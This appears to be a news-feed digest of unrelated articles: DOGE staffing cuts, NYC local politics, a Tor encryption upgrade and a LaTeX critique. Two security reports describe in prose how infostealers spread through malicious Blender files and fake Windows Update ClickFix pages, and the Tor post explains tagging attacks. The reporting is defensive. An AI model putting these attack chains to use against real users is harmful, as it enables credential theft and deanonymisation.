How much talent was lost due to DOGE cuts?

Once Musk left, confidence in DOGE waned as lawsuits over suspected illegal firings piled up . By June, Congress was drawn, largely down party lines , on whether to codify the “DOGE process”—rapidly firing employees, then quickly hiring back whoever was needed—or declare DOGE a failure—perhaps costing taxpayers more in the long term due to lost talent and services.

Because DOGE operated largely in secrecy, it may be months or even years before the public can assess the true cost of DOGE’s impact. However, in the absence of a government tracker, the director of the Center for Effective Public Management at the Brookings Institution, Elaine Kamarck, put together what might be the best status report showing how badly DOGE rocked government agencies.

In June, Kamarck joined other critics flagging DOGE’s reported savings as “bogus.” In the days before DOGE’s abrupt ending was announced, she published a report grappling with a critical question many have pondered since DOGE launched: “How many people can the federal government lose before it crashes?”

In the report, Kamarck charted “26,511 occasions where the Trump administration abruptly fired people and then hired them back.” She concluded that “a quick review of the reversals makes clear that the negative stereotype of the ‘paper-pushing bureaucrat'” that DOGE was supposedly targeting “is largely inaccurate.”

Instead, many of the positions the government rehired were “engineers, doctors, and other professionals whose work is critical to national security and public health,” Kamarck reported.

About half of the rehires, Kamarck estimated, “appear to have been mandated by the courts.” However, in about a quarter of cases, the government moved to rehire staffers before the court could weigh in, Kamarck reported. That seemed to be “a tacit admission that the blanket firings that took place during the DOGE era placed the federal government in danger of not being able to accomplish some of its most important missions,” she said.

Perhaps the biggest downside of all of DOGE’s hasty downsizing, though, is a trend in which many long-time government workers simply decided to leave or retire, rather than wait for DOGE to eliminate their roles.

During the first six months of Trump’s term, 154,000 federal employees signed up for the deferred resignation program, Reuters reported , while more than 70,000 retired. Both numbers were clear increases (tens of thousands) over exits from government in prior years, Kamarck’s report noted.

“A lot of people said, ‘the hell with this’ and left,” Kamarck told Ars.

Kamarck told Ars that her report makes it obvious that DOGE “cut muscle, not fat,” because “they didn’t really know what they were doing.”

As a result, agencies are now scrambling to assess the damage and rehire lost talent. However, her report documented that agencies aligned with Trump’s policies appear to have an easier time getting new hires approved, despite Kupor telling Reuters that the government-wide hiring freeze is “over.” As of mid-November 2025, “of the over 73,000 posted jobs, a candidate was selected for only about 14,400 of them,” Kamarck reported, noting that it was impossible to confirm how many selected candidates have officially started working.

“Agencies are having to do a lot of reassessments in terms of what happened,” Kamarck told Ars, concluding that DOGE “was basically a disaster.”

A decentralized DOGE may be more powerful

“DOGE is not dead,” though, Kamarck said, noting that “the cutting effort is definitely” continuing under the Office of Management and Budget, which “has a lot more power than DOGE ever had.”

However, the termination of DOGE does mean that “the way it operated is dead,” and that will likely come as a relief to government workers who expected DOGE to continue slashing agencies through July 2026 at least, if not beyond.

Many government workers are still fighting terminations, as court cases drag on, and even Kamarck has given up on tracking due to inconsistencies in outcomes.

“It’s still like one day the court says, ‘No, you can’t do that,'” Kamarck explained. “Then the next day another court says, ‘Yes, you can.'” Other times, the courts “change their minds,” or the Trump administration just doesn’t “listen to the courts, which is fairly terrifying,” Kamarck said.

Americans likely won’t get a clear picture of DOGE’s impact until power shifts in Washington. That could mean waiting for the next presidential election, or possibly if Democrats win a majority in midterm elections, DOGE investigations could start as early as 2027, Kamarck suggested.

OMB will likely continue with cuts that Americans appear to want, as White House spokesperson Liz Huston told Reuters that “President Trump was given a clear mandate to reduce waste, fraud and abuse across the federal government, and he continues to actively deliver on that commitment.”

However, Kamarck’s report noted polls showing that most Americans disapprove of how Trump is managing government and its workforce , perhaps indicating that OMB will be pressured to slow down and avoid roiling public opinion ahead of the midterms.

“The fact that ordinary Americans have come to question the downsizing is, most likely, the result of its rapid unfolding, with large cuts done quickly regardless of their impact on the government’s functioning,” Kamarck suggested. Even Musk began to question DOGE. After Trump announced plans to appeal an electrical vehicle mandate that the Tesla founder relied on, Musk posted on X , “What the heck was the point of DOGE, if he’s just going to increase the debt by $5 trillion??”

Facing “blowback” over the most unpopular cuts, agencies sometimes rehired cut staffers within 24 hours, Kamarck noted, pointing to the Department of Energy as one of the “most dramatic” earliest examples. In that case, Americans were alarmed to see engineers cut who were responsible for keeping the nation’s nuclear arsenal “safe and ready.” Retention for those posts was already a challenge due to “high demand in the private sector,” and the number of engineers was considered “too low” ahead of DOGE’s cuts. Everyone was reinstated within a day, Kamarck reported.

Alarm bells rang across the federal government, and it wasn’t just about doctors and engineers being cut or entire agencies being dismantled, like USAID. Even staffers DOGE viewed as having seemingly less critical duties—like travel bookers and customer service reps—were proven key to government functioning. Arbitrary cuts risked hurting Americans in myriad ways, hitting their pocketbooks, throttling community services, and limiting disease and disaster responses, Kamarck documented.

Now that the hiring freeze is lifted and OMB will be managing DOGE-like cuts moving forward, Kamarck suggested that Trump will face ongoing scrutiny over Musk’s controversial agency, despite its dissolution.

“In order to prove that the downsizing was worth the pain, the Trump administration will have to show that the government is still operating effectively,” Kamarck wrote. “But much could go wrong,” she reported, spouting a list of nightmare scenarios:

“Nuclear mismanagement or airline accidents would be catastrophic. Late disaster warnings from agencies monitoring weather patterns, such as the National Oceanic and Atmospheric Administration (NOAA), and inadequate responses from bodies such as the Federal Emergency Management Administration (FEMA), could put people in danger. Inadequate staffing at the FBI could result in counter-terrorism failures. Reductions in vaccine uptake could lead to the resurgence of diseases such as polio and measles. Inadequate funding and staffing for research could cause scientists to move their talents abroad. Social Security databases could be compromised, throwing millions into chaos as they seek to prove their earnings records, and persistent customer service problems will reverberate through the senior and disability communities.”

The good news is that federal agencies recovering from DOGE cuts are “aware of the time bombs and trying to fix them,” Kamarck told Ars. But with so much brain drain from DOGE’s first six months ripping so many agencies apart at their seams, the government may struggle to provide key services until lost talent can be effectively replaced, she said.

“I don’t know how quickly they can put Humpty Dumpty back together again,” Kamarck said.

Ashley is a senior policy reporter for Ars Technica, dedicated to tracking social impacts of emerging policies and new technologies. She is a Chicago-based journalist with 20 years of experience.

32 Comments

Malicious Blender model files deliver StealC infostealing malware

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 22:00:45
A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. [...]...
Original Article

Malicious Blender model files deliver StealC infostealing malware

A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.

Blender is a powerful open-source 3D creation suite that can execute Python scripts for automation, custom user interface panels, add-ons, rendering processes, rigging tools, and pipeline integration.

If the Auto Run feature is enabled, when a user opens a character rig, a Python script can automatically load the facial controls and custom UI panels with the required buttons and sliders.

Wiz

Despite the potential for abuse, users often activate the Auto Run option for convenience.

Researchers at cybersecurity company Morphisec observed attacks using malicious .blend files with embedded Python code that fetches a malware loader from a Cloudflare Workers domain.

Malicious Blender files
Malicious Blender files
Source: Morphisec

The loader then fetches a PowerShell script that retrieves two ZIP archives, ZalypaGyliveraV1 and BLENDERX, from attacker-controlled IPs.

The archives unpack into the %TEMP% folder and drop LNK files in the Startup directory for persistence. Next, they deploy two payloads, the StealC infostealer and an auxiliary Python stealer, likely used for redundancy.

Attack chain
Overview of the attack chain
Source: Morphisec

Morphisec researchers report that the StealC malware used in this campaign was the latest variant of the second major version of the malware that was analyzed by Zscaler researchers earlier this year.

The latest StealC has expanded its data-stealing capabilities and supports exfiltration from:

  • 23+ browsers, with server-side credential decryption and compatibility with Chrome 132+
  • 100+ cryptocurrency wallet browser extensions and 15+ cryptocurrency wallet apps
  • Telegram, Discord, Tox, Pidgin, VPN clients (ProtonVPN, OpenVPN), and mail clients (Thunderbird)
  • Updated UAC bypass mechanism

Despite the malware being documented since 2023 , subsequent releases appear to remain elusive for anti-virus products. Morphisec comments that no security engine on VirusTotal detected the StealC variant they analyzed.

Given that 3D model marketplaces cannot scrutinize the code in user-submitted files, Blender users are advised to exercise caution when using files sourced from such platforms and should consider disabling the auto-execution of code.

You can do this from Blender > Edit > Preferences > uncheck the 'Auto Run Python Scripts' option.

3D assets should be treated like executable files, and users should only trust publishers with a proven record. For everything else, it is recommended to use sandboxed environments for testing.

Wiz

Secrets Security Cheat Sheet: From Sprawl to Control

Whether you're cleaning up old keys or setting guardrails for AI-generated code, this guide helps your team build securely from the start.

Get the cheat sheet and take the guesswork out of secrets management.

As the Sun Sets on Curbside Dining This Year, City Council Eyes Overhaul for 2026

hellgate
hellgatenyc.com
2025-11-24 21:27:59
A package of bills would bring back year-round curbside dining, increase the size of sidewalk cafes, and make the approval process easier....
Original Article

As restaurants tear down their outdoor dining structures for the winter, the City Council took up legislation that could make this the last year businesses are forced to carry out the costly ritual.

At a joint hearing of the City Council's Transportation and Worker and Consumer Protection Committees on Monday, lawmakers considered bills introduced by Councilmember Lincoln Restler that would once again allow roadway dining year-round , ending the prohibition from December through March that took effect last year.

"In just five days, roadway dining structures across the city of New York will disappear. Instead of New Yorkers safely enjoying a bite to eat outside, we will have thousands of parked cars, SUVs, trucks lining our streets," Restler said, referring to the November 29 deadline for restaurants to pack in their outdoor setups. "Who knows how many restaurants will manage to come back in April after the costly disassembly and storage fees this season." He added, "The new iteration of this program is failing our city."

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Mayor-Elect Mamdani Says NYPD Spying on ICE Courtwatch Group Under Commissioner Tisch Is 'Deeply Troubling'

hellgate
hellgatenyc.com
2025-11-24 20:58:24
Mamdani said he will be speaking with Tisch, whom he is retaining in his administration, about the investigation....
Original Article

Since this summer, dozens of volunteers, including New York City Comptroller Brad Lander, have been sitting in on immigration court hearings in Lower Manhattan, bearing witness to ICE's kidnappings of immigrant New Yorkers. In addition to documenting the proceedings inside and outside of courtrooms, these courtwatchers aim to peacefully prevent ICE agents from detaining New Yorkers and separating families, by accompanying them out of courtrooms and courthouses.

Last week, it was revealed through a FOIA request that both the FBI and the NYPD have been spying on at least one Signal chat of immigrant rights activists who monitor immigration courts in Lower Manhattan. This collaboration has raised questions about the NYPD's coordination with federal immigration enforcement, as well as (once again) brought the NYPD's long history of often-illegal infiltration of political groups to the forefront.

On Monday afternoon, Mayor-elect Zohran Mamdani told Hell Gate that this type of spying and infiltration into courtwatch groups would not be acceptable under his administration.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

ClickFix attack uses fake Windows Update screen to push malware

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 20:42:35
New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. [...]...
Original Article

ClickFix attack uses fake Windows Update screen to push malware

ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.

ClickFix is a social-engineering attack where users are convinced to paste and execute in Windows Command Prompt code or commands that lead to running malware on the system.

The attack has been widely adopted by cybercriminals across all tiers due to its high effectiveness and has continually evolved, with increasingly advanced and deceptive lures.

Wiz

Fullscreen browser page

Since October 1st, researchers have observed ClickFix attacks where the pretense for executing dangerous commands was completing the installation of a critical Windows security update and the more common "human verification" lure [ 1 , 2 ].

The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes commands from the attacker that were automatically copied to the clipboard via JavaScript running on the site.

Fake Windows security update screen
Fake Windows security update screen
Source: BleepingComputer

A report from managed security services provider Huntress notes that the new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers.

In one variant, the hackers use a human verification page, while in another they rely on the fake Windows Update screen.

In both cases, though, the threat actors used steganography to encode the final malware payload inside an image.

"Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory," Huntress researchers explain .

Delivering the final payload starts with using the mshta Windows-native binary to execute malicious JavaScript code.

The entire process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state.

Inside Stego Loader’s manifest resources, there is an AES-encrypted blob that is actually a steganographic PNG file containing shellcode that is reconstructed using custom C# code.

Huntress researchers noticed that the threat actor used a dynamic evasion tactic, commonly referred to as ctrampoline, where the entry point function started calling 10,000 empty functions.

Trampoline call chain
Trampoline call chain
Source: Huntress

The shellcode holding the infostealer samples is extracted from the encrypted image and is packed using the Donut tool that allows executing VBScript, JScript, EXE, DLL files, and .NET assemblies in memory.

After unpacking, Huntress researchers were able to retrieve the malware, which in the analyzed attacks was LummaC2 and Rhadamanthys.

The diagram below serves as a visual representation of how the entire attack works:

Overview of the attack
Overview of the attack
Source: Huntress

The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13 .

Huntress reports that the law enforcement operation resulted in the payload not being delivered anymore on the fake Windows Update domains, which are still active.

To stay safe from this type of ClickFix attacks, the researchers recommend disabling the Windows Run box and monitoring for suspicious process chains such as explorer.exe spawning mshta.exe or PowerShell.

Additionally, when investigating a cybersecurity incident, analysts can check the RunMRU registry key to see if the user entered commands in the Windows Run box.

Wiz

7 Security Best Practices for MCP

As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.

This free cheat sheet outlines 7 best practices you can start using today.

Counter Galois Onion: Improved encryption for Tor circuit traffic

Lobsters
blog.torproject.org
2025-11-24 20:07:34
Comments...
Original Article

It's always a good day when we can talk about cryptography. Especially when we are sunsetting one of the oldest and most important encryption algorithms in Tor and replacing it with a research-backed new design, called Counter Galois Onion.

This overhaul will defend users against a broader class of online attackers (described below), and form the basis for more encryption work in the future.

Which cryptography are we talking about here?

The algorithm in question is Tor's relay encryption . While Tor uses the standard TLS protocol for communication between relays, and between clients and relays, it needs a specialized algorithm for encrypting user data as it traverses multiple relays in a circuit. 1

That's the relay encryption algorithm. The client shares a symmetric key with each relay on its circuit, and encrypts an outgoing message, or "relay cell" with each one of those keys. Each relay can remove a single layer of encryption, until the client's cell reaches the exit relay.

Of course, we need to make sure that the data isn't modified on the way from the client. For that, we include a cryptographic digest in the cell. The digest covers not only the cell itself, but also all previous cells sent through the circuit (to prevent re-ordering) and another secret shared key (to make the digest unpredictable).

So with the digest added, clients behave as follows: they calculate and set the digest, then they use a stream cipher (AES-128-CTR in Tor's case) multiple times to encrypt the cell for each relay.

If we simplify a lot , then a relay cell looks a little like this:

Field Width
Zero 2 bytes
Digest 4 bytes
Other stuff ...

The "zero" field is there so that nodes other than the exit can avoid checking the digest: If a relay gets a cell with a value other than zero, then it can tell that it isn't the recipient of that cell, so it doesn't need to check the digest: it just decrypts the cell and forwards it to the next relay.

When we designed this algorithm, we didn't give it a name. Now that we're replacing it, it helps to have some way to identify it, so we're calling it "tor1".

A diagram of the Tor1 encryption algorithm
Figure 1. The tor1 encryption algorithm, as used at a middle layer.

The input is a message M. A counter CTR is expanded via a psueodrandom function (PRF, instantiated with AES-128-CTR), to produce a stream of bytes. These bytes are xored with M to produce a ciphertext C.

A diagram of the Tor1 encryption algorithm
Figure 2: The tor1 encryption algorithm, as used to originate a message.

The message M is mixed with the hash state HS, and a portion of the digest is appended to the message. The whole thing is then xored with the PRF (AES-128-CTR) to produce our ciphertext C.

Wait, that design looks funny!

Yeah, you wouldn't build it that way nowadays, would you? That's why we're replacing it.

In today's world of high-quality online courses and excellent introductory material , it's easy to forget the general state of accessible cryptography resources when Tor was getting started. AES was brand new , and authenticated encryption as a separate field of study had just started to emerge.

Existing designs weren't suitable for Tor's needs. The original onion routing paper didn't specify a means for authentication. Designs like mixmaster and mixminion were optimized for larger message sizes, and required a separate full digest for every possible layer of encryption. (For example, Mixmaster supported up to 20 remailers, so had to reserve space for 20 digests (and other stuff) in every message .)

Some of the "weird things" in the current tor1 design are outdated, but not awful ; others are things that are more valuable to resolve.

So, what are the problems with the tor1 design?

There are a few. First the big one:

Problem 1: Tagging attacks

Tagging attacks enable an active adversary to trace traffic by modifying it in one place on the network, and observing predicatable changes in another. Even when tagging attacks don't succeed immediately, their side effects can give the attacker more and more opportunities to retry.

This is the most important attack we're solving with CGO. Even without the other problems below, this one would be worth fixing on its own.

The main version of this attack arises because tor1's use of AES-CTR encryption with no hop-by-hop authentication means that the relay encryption is malleable . Since counter mode derives its ciphertext C by XORing a secret key stream S with the plaintext P (C = S ⊕ P), an attacker who can XOR their own pattern M in to the ciphertext will produce C' = (S ⊕ P) ⊕ M = S ⊕ (P ⊕ M) — that is, a valid encryption of (P ⊕ M).

An attacker can use this attack to ensure that they control both ends of the circuit. They XOR a pattern onto a cell at one end, and then see if any garbled cells at the other end become clear when whey remove that same pattern. Any circuits with an honest endpoint will fail (and not be deanonymized), but the client will retry them until they eventually choose a malicious endpoint.

If the attacker chooses a known-plaintext portion of the relay cell for their marker (such as the header or slack zero space), then they can use their marker to communicate an identifier across the circuit, by retrieving it at the end:

 M = (P ⊕ M) ⊕ P.

M can then be used to transmit an IP address or unique identifier for the user.

In comparison to probabilistic traffic correlation, this attack provides definite results immediately, with a strength multiplier: it also allows the attacker to ensure that all the traffic they successfully carry is fully deanonymized, before the circuit is used for any application traffic at all.

The downside for the attacker is that the resulting failure rate of circuits can be detected by the client. Currently, Tor clients emit log notices and warnings when circuit failure rates are excessively high. Unfortunately, as vigilant users have noticed, when the DDoS attacks on Tor become severe, these detectors give false alarms.

This class of attacks (where an adversary is able to abuse the Tor Protocol to transmit information between relays before application activity) is known as Internal Covert Channel attacks . Tor is in the process of updating its threat model to cover these attack vectors explicitly, along with two other categories of attack vectors.

Problem 2: Forward secrecy begins when a circuit closes

This attack and the one after it are much less severe than the tagging attack above; we mention them for the sake of completeness.

In many modern online protocols, including messaging apps like Signal , the keys used to decrypt a message are destroyed as soon as the message is decrypted, so that nobody can steal them and use them later on. But Tor's old encryption algorithm (tor1) doesn't provide this property: the same AES keys are used for the entire life of the circuit. That means that if a key was stolen while the circuit was still alive, all previous traffic on the circuit could be decrypted.

When a circuit's lifetime is on the order of minutes, that's not so bad, but sometimes circuits stay around for days. (What's more, longer-lived circuits may be better for anonymity, especially when the user is maintaining a persistent identity, so it's a good idea to make them stronger.)

Although this attack is minor in comparison to the tagging issue, we may as well address it while we are updating our encryption.

Problem 3: A 4-byte authenticator? Seriously?

Yeah, that's not great. The use of a mere 4-byte digest means that there's a one-in-4-billion chance to forge a cell undetected.

That isn't a very good attack in practice: if the attacker doesn't get lucky with their guess, then their invalid message causes the circuit to fail, and they can't try again unless the client builds another circuit through them. The same pathbias mechanisms that help resist tagging attacks also help here, but it would be better not to need them.

(Also, it's using SHA-1, which is showing its age, to say the least. 2 )

So, how did we think about replacing this in the past?

We've wanted to replace this algorithm a few times, but we've been hung up on issues of design and efficiency.

We definitely don't want to follow remailer designs by adding one authenticator per layer of encryption: that way lies big overhead. If we tried something like that with onion services, we'd be devoting something like 15% of our bandwidth to authenticator fields.

One promising design element has been wide-block ciphers : these are ciphers (or modes of using ciphers) that encrypt an entire message as if it were a single opaque block: any change in the ciphertext garbles the entire message as if it were a single block in a regular block cipher.

(Technically, this needs to be a " strong pseudorandom permutation " (SPRP) if it's going to resist tagging attacks.)

You can make a wide-block cipher into an authenticated cipher by reserving some portion of the plaintext for a known value -- say, 16 bytes of zeros.

But most wide-block cipher designs are comparatively expensive. Nearly all of the strong ones ( BEARESS, LIONESS , biIGE , HHFHFH ) require two full encryptions and two hashes over the data. Newer modes like HCTR2 require only one encryption pass, but still need two hashes. (For comparison: tor1 requires 3 encryptions and one hash for a cell on a 3-hop circuit, whereas one of these designs requires on the order of 6 encryptions and 6 hashes.)

We're willing to pay some CPU cost for improved cryptography (and we should expect to pay some cost, since authentication doesn't come for free) but we need to keep the cost to a minimum.

Now, multiple passes are necessary for any wide-block design: it's provable that there's no way to make sure that changing any bit will potentially garble every other bit unless there are at least two passes. But we'd like to make these passes as cheap as possible!

There has also been excellent work on other wide-block designs built from scratch, rather than from an underlying cipher (notably AEZ ).

What are we going with?

For years now, cryptographers have been looking for good solutions here.

Jean Paul Degabriele , Alessandro Melloni , Jean-Pierre Münch , and Martijn Stam have a design that they're calling Counter Galois Onion (CGO). It's based on a kind of construction called a Rugged Pseudorandom Permutation (RPRP): essentially, it's a design for a wide-block cipher that resists malleability in one direction (for the encrypt operation, but not the decrypt operation). If we deploy this so that clients always decrypt and relays always encrypt, then we have a tagging resistant 3 cipher at less cost than a full SPRP!

Using a RPRP that they call UIV+ (see the paper ), the authors achieve all of our goals (tagging resistance, immediate forward secrecy, longer authentication tags, limited bandwidth overhead, relatively efficient operation, and modernized cryptography).

(Shortly before this blog post went up, they revised their paper and released a new security proof .)

We've written a specification which matches their paper and their reference implementation.

How does it work?

CGO makes it so that if anybody tampers with any part of your encrypted data, the entire message, and all future messages, become unrecoverable. Here's how!

(If you don't like reading cipher diagrams, you may want to skip this section. And if you really like reading them, you should check out the specification and the paper !)

The figures below present the UIV+ building block, and show how it is used to build CGO encryption.

Figure 3: UIV+ encryption

The input X is split into two parts: A short X_L, and a longer X_R. X_R, and a "tweak" value H, are themselves passed as tweaks to a tweakable block cipher E_T (instantiated with LRW2 ), which is then used used to encrypt X_L. The output of this encryption seeds a PRF, which is xored into X_R to encrypt it.

Figure 4: Middle-layer CGO encryption.

CGO treats every message as a 16-byte tag T, and a 493-byte ciphertext C. These are passed as X_L and X_R to the UIV+ encryption algorithm above. The tweak value (H in UIV+) is here called T': each cell's "T" value, after encryption, is taken as the T' for the next cell.

Figure 5: Originating a CGO message

When _originating_ the message, CGO initializes its tag as a nonce value N. The value of N, _and the encryption keys_, are all transformed using an "Update" algorithm as the message is encrypted. The new N, and the new encryption keys, will be used to encrypt the next cell.

Okay, but how does all of this cryptography solve the problems we began with?

First (and most importantly) tagging attacks are prevented by two factors:

  1. When encrypting 4 , the message is transformed in a wide-block construction, so that any change to the input renders the entire output unrecoverable.
  2. The chaining of T' and N values means that a message's encryption depends on all previous messages , so if a single message is garbled, all subsequent messages will be unrecoverable.

Second, forward secrecy is achieved with the Update construction in figure 5. Every time a new cell is originated or received, the keys used to originate or receive it are transformed unrecoverably, so that the encryptor/decryptor no longer holds the keys necessary to decrypt earlier cells.

Third, the truncated digest is now replaced with a nice long 16-byte authenticator, like sensible people use.

Aside: What if we're wrong?

CGO is a fairly new design, and it's reasonable to ask whether there could be weaknesses in it that would make it worse than it's designed to be. I'd answer: There might be! Attacks only get better with time, and although the cryptographers behind CGO are skilled and well regarded, even the best cryptographers can make mistakes. There is a security proof , but it's fairly recent, and and it hasn't yet gotten intensive scrutiny. With time, as CGO gets attention from more cryptographers, we'll (hopefully) gain more confidence in its strength. (And if we do decide that we need to replace it, the work we've done to add it to Arti and the C Tor implementation will make it much easier to do a later migration to a different system later on.)

But what we are pretty sure about is that there aren't likely to be any weaknesses in CGO that would make it worse than tor1.

Where does our implementation stand?

It's underway!

We've implemented the cryptography for Arti, the Rust Tor implementation. We've also implemented it in C, since it won't do us any good unless relays support it too, and the Arti relay project is still a work in progress.

In order to build this implementation, we've had to refactor a lot of code to revise its existing assumptions: for example, we've had to revise all the places where we assumed anything about the layout of a relay cell, or where we assumed that there was only one way to do relay encryption. These changes will help us with any other changes to relay cell formatting and encryption in the future.

Our next steps are:

  • Enable CGO by default in Arti. (It's currently marked as experimental because of some of its dependencies.)

  • Implement CGO negotiation for onion services. (This feature is likely to be be Arti-only, due to its complexity.)

  • Tune the performance for modern CPUs. (The CGO authors got impressively good results for their optimized implementation, but some of the tricks they used will be pretty hard to deliver in the C Tor implementation without big refactoring. Fortunately, there are some low-hanging fruit in optimizing what we have today.)

Thanks for your help!

Thanks to all the cryptographers, programmers, researchers, and cypherpunks who have contributed to this work over the years. Thanks also to all the researchers who have advanced this work, and the state of modern cryptography; we all stand on the work they have built.

And thanks to Mike Perry for helping me write this and get the parts of the threat model right.

And finally, thanks to everybody who has donated to Tor over the years! A lot of this work is done through a grant from the Bureau of Democracy, Human Rights, and Labor , but many critical parts of this work (including years of past groundwork, and all the parts related to onion services) have been paid for out of our unrestricted funds, which rely on donors like you. Thanks for believing in our mission, and thanks for helping to make Tor better! <3

Is LaTeX worth it? (2023)

Lobsters
philipphagenlocher.de
2025-11-24 20:01:20
Comments...
Original Article

Introduction

While LaTeX is rightfully praised for its qualities, its (sometimes obvious) flaws are often ignored or downplayed. The learning curve is quite steep and its usability is far from optimal. Is it even worth it to learn LaTeX? What kind of work can we realistically get done using it? Are there alternatives? When do we really need LaTeX?

IMPORTANT

All throughout this post I will use the name “LaTeX” to refer to the holistic view on the system for creating documents including the TeX typesetting system, LaTeX macros, associated distributions (pdfTex, XeTeX, etc.) and common editors.

This post is aiming to provide a critical view, mainly highlighting problems and shortcomings. It is not meant as a fair assessment of the pros and cons. This is a rant; you have been warned.

To start the discussion I first want to go into my experience with LaTeX.

Perfect Typesetting Made Easy?

My history with LaTeX started over 10 years ago. I was fed up with WYSIWYG editors after working with Microsoft Word 2007 for a while. Images constantly jumping around, formatting randomly breaking when content changes and no easy way to manipulate the fundamental style of a document after its creation. “There must be a better way,” I thought. And a better way there was.

The Promise…

After looking around online I stumbled upon LaTeX which was praised as the perfect alternative to visual editors. The promise was simple. Don’t worry about formatting or typesetting, just worry about your writing! Design and content are separated and defaults are not just sane, but virtually optimal.

Obviously, I started learning LaTeX and started using it for everything. School work, letters, applications, CVs, presentations, later university work, random manuscripts, software documentation, white papers and any other kind of written document. Why use an visual editor to create diagrams when there is TikZ ? Why worry about using proprietary editors when LaTeX distributions are open-source, cross-platform and you can use any editor you like?

It seemed to me that LaTeX was the ultimate way of constructing any document. Why learn different document editors or even a publishing software like InDesign when everything can be done with one unified interface?

…meets Reality

I woke up from this dream when I tried to design a quote template for a small business I had. Designing a document with an address section, small table and some bank details in its footer that didn’t look pretentious was almost impossible. Changing fonts families and sizes? Changing spacing in a table? An utter chore.

At this point I tried something new and redid the document in LibreOffice Writer. It looked much better… and was done in a fraction of the time even though I had virtually no idea how to use Writer. 1

Of course, this was only a small setback in my journey. My first real dissatisfaction arose when using LaTeX for its intended use case: Large documents. While writing both my bachelor’s and master’s thesis I have gotten to know the good and some of the bad parts of LaTeX quite well. I started noticing that the bad, annoying and productivity-destroying parts where harder and harder to ignore. However, I was still convinced that it is the best way to construct documents.

When starting work on my book , I was surprised that my publisher wasn’t using LaTeX but AsciiDoc . This obviously didn’t compute with me at first. However, after working with AsciiDoc for way over a year now it made me rethink many problems that an author has to face when using LaTeX. I want to highlight these problems in the following sections starting with my greatest pain point.

Handling the Syntax

The syntax of LaTeX is weirdly verbose yet unspecific, very expressive yet cryptic and, while trying to make the job of the author easier, a nightmare to type quickly. I think this is one of the major problems of adopting LaTeX for most people.

What Am I Reading?

The source of a LaTeX document is hard to read. By that I don’t mean the physical act of reading the letters on the screen but ascertaining the overall structure of a document just from looking at the source. A LaTeX document consists of many varied control structures that act interdependently. Some change the formatting, some change the font characteristics and many of them add completely new features. Every package that is added to the document adds its own commands and environments with their own rules. Reading something you haven’t written yourself is puzzling.

The readability is worsened by the absurd number of symbol control sequences present. You cannot simply copy an UTF-8 symbol from the web into your document. You cannot just type Wörds with umlauts and expect them to work. You want to include the symbol? Well, that requires a special package import for it to work and you will have to write it like so: \euro{} . Every triviality has its numerous hoops to jump through.

It also doesn’t help that LaTeX mixes imperative and declarative styles in its language. While most directives work declaratively, like environments, others have to be used in the correct sequence. Examples for imperative directives are font sizes ( \tiny , \Large , etc.), spaces ( \vspace , \stretch , etc.) and fills ( \hfill , \vfill ). Font style ( \textbf , \textit , etc.) is done declaratively, however.

This leads to bizarre syntax like this:

\Huge % Set text size to "Huge"
\begin{center} % Begin centering
  Title % Only this is centered
\end{center} % End centering
\vspace{10pt} % Add vertical space
\Large % Set text size to "Large"
\noindent % Do not indent the next line
\textbf{Lorem ipsum} dolor sit amet, % Set the first two words to bold
\normalsize % The following text is normal sized
consectetur adipiscing elit. % Just normal text

However, this can be cleaned up slightly by defining a scope for directives such as \Huge . We then end up with this snippet, which is not much better:

{\Huge % Begin "Huge" text size
  \begin{center} % Start centering
    Title % Only this is centered
  \end{center} % End centering
} % End "Huge" text size
\vspace{10pt} % Add vertical space
\noindent % Do not indent the next line
{\Large % Begin "Large" text size
  \textbf{Lorem ipsum} dolor sit amet, % Set the first two words to bold
} % End "Large" text size
consectetur adipiscing elit. % Just normal text

While this might be an artificial and exaggerated example it aims to highlight the inherent problem of the syntax. Each command needs to be evaluated based on where in the code it shows up and what it is surrounded by. For example, \noindent only works if there is no space between it and the next line.

\noindent % This works
I am not indented.

\noindent % This also works
% This comment doesn't count as a blank line
I am also not indented.

\noindent % This doesn't work

I am indented.

In complex documents it is simply not possible to accurately surmise how different directives act on the structure. The complexity is augmented by interdependence between packages leading to confusion on how they change the behavior of other packages like in this example:

\usepackage{hyperref}
\usepackage{cleveref} % Has to be loaded after hyperref!

hyperref is a prime candidate for this problem as can be seen here . This problem worsens when we take into account how code from different packages interacts. As a trivial example, one might look at problems that arises when using figures and the multicol package. To quote Overleaf :

Floats in the multicol package are poorly supported in the current version. Elements inserted with the conventional figure and table environments will show up only at the top or bottom of the next page after they are inserted, and will break the layout.

However, when the question of how included packages work is solved the problems are only beginning. Let’s look at bloated syntax for basic lists.

Verbose Environments

enumerate and itemize provide very simple functionality with inanely complicated syntax. Their job is to define a simple list, either with numbers or bullet points. The problem comes in the way they are written down. Every list has to be wrapped in a special environment.

\begin{enumerate}
    \item First
    \item Second
    \item Third
\end{enumerate}

This seems fine at first until you realize that in nested lists, you have to define an environment inside an environment and each subsequent sub-list has to have its own begin and end .

\begin{enumerate}
    \item First
    \begin{enumerate}
        \item First Sub
        \item Second Sub
    \end{enumerate}
    \item Second
    \begin{enumerate}
        \item Third Sub
        \item Fourth Sub
    \end{enumerate}
\end{enumerate}

In WYSIWYG editors writing such lists is easy, intuitive and can be navigated really quickly with simple keyboard shortcuts. In Markdown-like languages, it’s even easier.

* First
  * First Sub
  * Second Sub
* Second
  * Third Sub
  * Fourth Sub

The syntax for environments, be it for lists, text-alignment, figures, tables, code listings, and almost anything else is simply cumbersome. While configured editors can help with automatically completing the syntax it is still hard to edit existing constructs.

Error Proneness

